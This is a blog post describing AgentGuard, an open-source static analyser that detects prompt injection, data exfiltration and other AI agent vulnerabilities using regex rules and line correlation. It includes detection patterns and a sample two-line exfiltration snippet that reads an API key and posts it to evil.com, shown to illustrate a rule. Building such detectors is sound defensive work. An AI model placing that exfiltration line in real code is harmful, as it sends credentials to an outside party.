Dockfix Labs

Posted on Jun 28

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

#ai #security #python #devtools

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.

The Regex Foundation

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

# ASI01: Prompt Injection
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

The Problem with Regex

Regex has limits. Consider:

# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: AST-based semantic analysis.

The AST Layer (Roadmap)

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

Identify sources: function parameters named user_input, query, message, request.body
Track propagation: variable assignments, string formatting, list/dict construction
Identify sinks: openai.chat.completions.create, prompt, messages, system
Flag paths: any path from source to sink without sanitization

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.

Correlation Detection

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

# Line 1: Secret access
api_key = os.environ.get("API_KEY")

# Line 2: Network call
requests.post("https://evil.com/collect", headers={"Auth": api_key})

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.

Future versions will extend this to full function-level taint tracking.

The OWASP ASI Top 10 Coverage

AgentGuard currently covers all 10 categories:

ASI	Rule	Detection Method
ASI01	Prompt Injection	Regex (f-string, concat, format)
ASI02	Tool Abuse	Regex (os.system, subprocess, eval)
ASI03	Data Exfiltration	Regex + cross-line correlation
ASI04	Excessive Agency	Regex (auto-execute, no-confirm)
ASI05	Supply Chain	Regex (untrusted pip install, dynamic import)
ASI06	Insecure Output	Regex (raw HTML, eval output)
ASI07	Credential Exposure	Regex (API keys, private keys, passwords)
ASI08	Context Manipulation	Regex (context stuffing, token bombing)
ASI09	Agent Loop Exploitation	Regex (recursive calls, no depth limit)
ASI10	Trust Boundary	Regex (mixed privilege, cross-agent calls)

Benchmark Results

The benchmark suite has 28 samples:

ASI01 (6 samples): 100% detection
ASI02 (5 samples): 100% detection
ASI03 (4 samples): 100% detection
ASI07 (6 samples): 100% detection
ASI10 (5 samples): 100% detection
Clean (2 samples): 0% false positives

What's Next

AST-based taint tracking for Python and JavaScript
Language support: Rust, Go, Java
GitHub Code Scanning integration via SARIF
MCP server mode for real-time scanning in AI coding assistants
Semantic injection detection -- understanding prompt structure, not just string patterns

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.

DEV Community

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

The Regex Foundation

The Problem with Regex

The AST Layer (Roadmap)

Correlation Detection

The OWASP ASI Top 10 Coverage

Benchmark Results

What's Next

Top comments (0)